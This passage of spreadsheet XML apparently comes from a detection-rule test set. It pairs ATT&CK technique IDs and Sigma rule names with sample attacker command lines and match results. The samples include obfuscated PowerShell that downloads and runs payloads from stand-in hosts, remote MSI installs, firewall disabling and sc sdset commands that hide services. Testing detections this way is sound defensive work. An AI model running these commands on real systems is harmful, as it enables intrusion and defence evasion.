          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE (ba4cfc11-d0fa-4d94-bf20-7c332c412e76)</t>
        </is>
      </c>
      <c r="J2942" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2942" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2943" ht="15.75" customHeight="1" s="42">
      <c r="A2943" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2943" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr_susp</t>
        </is>
      </c>
      <c r="C2943" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2943" s="43" t="inlineStr">
        <is>
          <t>ba4cfc11-d0fa-4d94-bf20-7c332c412e76</t>
        </is>
      </c>
      <c r="E2943" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -a {REGSVR "malware.bin"}</t>
        </is>
      </c>
      <c r="F2943" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2943" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2943" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2943" s="43" t="inlineStr">
        <is>
          <t>Potentially Suspicious DLL Registered Via Odbcconf.EXE (ba4cfc11-d0fa-4d94-bf20-7c332c412e76)</t>
        </is>
      </c>
      <c r="J2943" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2943" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2944" ht="15.75" customHeight="1" s="42">
      <c r="A2944" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2944" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2944" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2944" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2944" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F2944" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2944" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2944" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2944" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2944" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2944" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2945" ht="15.75" customHeight="1" s="42">
      <c r="A2945" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2945" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2945" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2945" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2945" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe  -f  "T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F2945" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2945" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2945" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2945" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2945" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2945" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2946" ht="15.75" customHeight="1" s="42">
      <c r="A2946" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2946" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2946" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2946" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2946" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe /f "T1218.008.rsp"</t>
        </is>
      </c>
      <c r="F2946" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2946" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2946" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2946" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2946" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2946" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2947" ht="15.75" customHeight="1" s="42">
      <c r="A2947" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2947" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2947" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2947" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2947" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.rsp"\n</t>
        </is>
      </c>
      <c r="F2947" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2947" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2947" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2947" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2947" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2947" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2948" ht="15.75" customHeight="1" s="42">
      <c r="A2948" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2948" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2948" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2948" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2948" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.rsp"\t</t>
        </is>
      </c>
      <c r="F2948" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2948" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2948" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2948" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2948" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2948" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2949" ht="15.75" customHeight="1" s="42">
      <c r="A2949" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2949" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2949" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2949" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2949" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.rsp"\r</t>
        </is>
      </c>
      <c r="F2949" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2949" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2949" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2949" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2949" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2949" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2950" ht="15.75" customHeight="1" s="42">
      <c r="A2950" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2950" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2950" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2950" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2950" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.rsp"\x20</t>
        </is>
      </c>
      <c r="F2950" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2950" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2950" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2950" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2951" ht="15.75" customHeight="1" s="42">
      <c r="A2951" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2951" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_response_file</t>
        </is>
      </c>
      <c r="C2951" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2951" s="43" t="inlineStr">
        <is>
          <t>5f03babb-12db-4eec-8c82-7b4cb5580868</t>
        </is>
      </c>
      <c r="E2951" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe -f "T1218.008.rsp"\u0020</t>
        </is>
      </c>
      <c r="F2951" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2951" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2951" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2951" s="43" t="inlineStr">
        <is>
          <t>Response File Execution Via Odbcconf.EXE (5f03babb-12db-4eec-8c82-7b4cb5580868)</t>
        </is>
      </c>
      <c r="J2951" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2951" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2952" ht="15.75" customHeight="1" s="42">
      <c r="A2952" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2952" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2952" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2952" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2952" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -w hidden -c "$u='http://example.com/payload.msi'; $t='W'+'indowsInstaller.Installer'; $i=New-Object -ComObject $t; $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F2952" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2952" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2952" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2952" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J2952" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2952" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2953" ht="15.75" customHeight="1" s="42">
      <c r="A2953" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2953" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C2953" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D2953" s="43" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E2953" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='http://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F2953" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2953" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2953" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2953" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J2953" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2953" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2954" ht="15.75" customHeight="1" s="42">
      <c r="A2954" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2954" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_obfuscated_ordinal_call</t>
        </is>
      </c>
      <c r="C2954" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32</t>
        </is>
      </c>
      <c r="D2954" s="43" t="inlineStr">
        <is>
          <t>43fa5350-db63-4b8f-9a01-789a427074e1</t>
        </is>
      </c>
      <c r="E2954" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll,#00131096</t>
        </is>
      </c>
      <c r="F2954" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2954" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2954" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1); Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1)</t>
        </is>
      </c>
      <c r="J2954" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2954" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2955" ht="15.75" customHeight="1" s="42">
      <c r="A2955" s="43" t="inlineStr">
        <is>
          <t>t1027.010</t>
        </is>
      </c>
      <c r="B2955" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_obfuscated_ordinal_call</t>
        </is>
      </c>
      <c r="C2955" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32</t>
        </is>
      </c>
      <c r="D2955" s="43" t="inlineStr">
        <is>
          <t>43fa5350-db63-4b8f-9a01-789a427074e1</t>
        </is>
      </c>
      <c r="E2955" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe payload.dll, #0131096</t>
        </is>
      </c>
      <c r="F2955" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2955" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2955" s="43" t="inlineStr">
        <is>
          <t>Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1); Potential Obfuscated Ordinal Call Via Rundll32 (43fa5350-db63-4b8f-9a01-789a427074e1)</t>
        </is>
      </c>
      <c r="J2955" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2955" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2956" ht="15.75" customHeight="1" s="42">
      <c r="A2956" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2956" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C2956" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D2956" s="43" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E2956" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-NetFirewallProfile -Profile `"Private`" -Enabled False"</t>
        </is>
      </c>
      <c r="F2956" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2956" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2956" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell (12f6b752-042d-483e-bf9c-915a6d06ad75)</t>
        </is>
      </c>
      <c r="J2956" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2956" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2957" ht="15.75" customHeight="1" s="42">
      <c r="A2957" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2957" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C2957" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D2957" s="43" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E2957" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Set-NetFirewallProfile -Profile Domain -Enabled False</t>
        </is>
      </c>
      <c r="F2957" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2957" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2957" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell (12f6b752-042d-483e-bf9c-915a6d06ad75)</t>
        </is>
      </c>
      <c r="J2957" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2957" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2958" ht="15.75" customHeight="1" s="42">
      <c r="A2958" s="43" t="inlineStr">
        <is>
          <t>t1562</t>
        </is>
      </c>
      <c r="B2958" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_disable_firewall</t>
        </is>
      </c>
      <c r="C2958" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell</t>
        </is>
      </c>
      <c r="D2958" s="43" t="inlineStr">
        <is>
          <t>12f6b752-042d-483e-bf9c-915a6d06ad75</t>
        </is>
      </c>
      <c r="E2958" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command Set-NetFirewallProfile -Profile Private -Enabled False -All</t>
        </is>
      </c>
      <c r="F2958" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2958" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2958" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2958" s="43" t="inlineStr">
        <is>
          <t>Windows Firewall Disabled via PowerShell (12f6b752-042d-483e-bf9c-915a6d06ad75)</t>
        </is>
      </c>
      <c r="J2958" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2958" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2959" ht="15.75" customHeight="1" s="42">
      <c r="A2959" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2959" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C2959" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2959" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E2959" s="43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2959" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2959" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2959" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2959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959" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2959" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2960" ht="15.75" customHeight="1" s="42">
      <c r="A2960" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2960" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C2960" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2960" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E2960" s="43" t="inlineStr">
        <is>
          <t>sc.exe sdset "MyHiddenService" D:(D;;DCLCWPDTSD;;;IU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)</t>
        </is>
      </c>
      <c r="F2960" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2960" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2960" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2960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960" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2960" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2961" ht="15.75" customHeight="1" s="42">
      <c r="A2961" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2961" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C2961" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2961" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E2961" s="43" t="inlineStr">
        <is>
          <t>sc.exe sdset "MyHiddenService" D:(D;;DC;;;IU)(D;;LC;;;IU)(D;;WP;;;IU)(D;;DT;;;IU)(D;;SD;;;IU)</t>
        </is>
      </c>
      <c r="F2961" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2961" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2961" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2961" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J2961" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2961" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2962" ht="15.75" customHeight="1" s="42">
      <c r="A2962" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2962" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C2962" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2962" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E2962" s="43" t="inlineStr">
        <is>
          <t>sc sdset VSS D:(D;;GA;;;NU)(D;;GA;;;WD)(D;;GA;;;AN)S:(AU;FA;GA;;;WD)(AU;OIIOFA;GA;;;WD)</t>
        </is>
      </c>
      <c r="F2962" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2962" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2962" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2962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2962" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2962" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2963" ht="15.75" customHeight="1" s="42">
      <c r="A2963" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2963" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C2963" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2963" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E2963" s="43" t="inlineStr">
        <is>
          <t>sc sdset AtomicService "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"</t>
        </is>
      </c>
      <c r="F2963" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2963" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2963" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2963" s="43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2963" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2963" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2964" ht="15.75" customHeight="1" s="42">
      <c r="A2964" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2964" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C2964" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2964" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E2964" s="43" t="inlineStr">
        <is>
          <t>sc.exe sdset scmanager D:(A;;KA;;;WD)</t>
        </is>
      </c>
      <c r="F2964" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2964" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2964" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2964" s="43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2964" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2964" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2965" ht="15.75" customHeight="1" s="42">
      <c r="A2965" s="43" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B2965" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C2965" s="43" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D2965" s="43" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E2965" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp;('In'+'voke-Ex'+'pression') (.('Ne'+'w-Ob'+'ject') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F2965" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2965" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2965" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2965" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2965" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2965" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2966" ht="15.75" customHeight="1" s="42">
      <c r="A2966" s="43" t="inlineStr">
        <is>
          <t>t1027.009</t>
        </is>
      </c>
      <c r="B2966" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_token_obfuscation</t>
        </is>
      </c>
      <c r="C2966" s="43" t="inlineStr">
        <is>
          <t>Powershell Token Obfuscation - Process Creation</t>
        </is>
      </c>
      <c r="D2966" s="43" t="inlineStr">
        <is>
          <t>deb9b646-a508-44ee-b7c9-d8965921c6b6</t>
        </is>
      </c>
      <c r="E2966" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp;({0}{1}{2}{3}{4} -f 'In','voke-','Ex','pres','sion') (.({0}{1}{2} -f 'Ne','w-','Obje'+'ct') Net.WebClient).DownloadString('http://malicious.local/payload')"</t>
        </is>
      </c>
      <c r="F2966" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2966" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2966" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2966" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J2966" s="43" t="n">
        <v>3</v>
      </c>
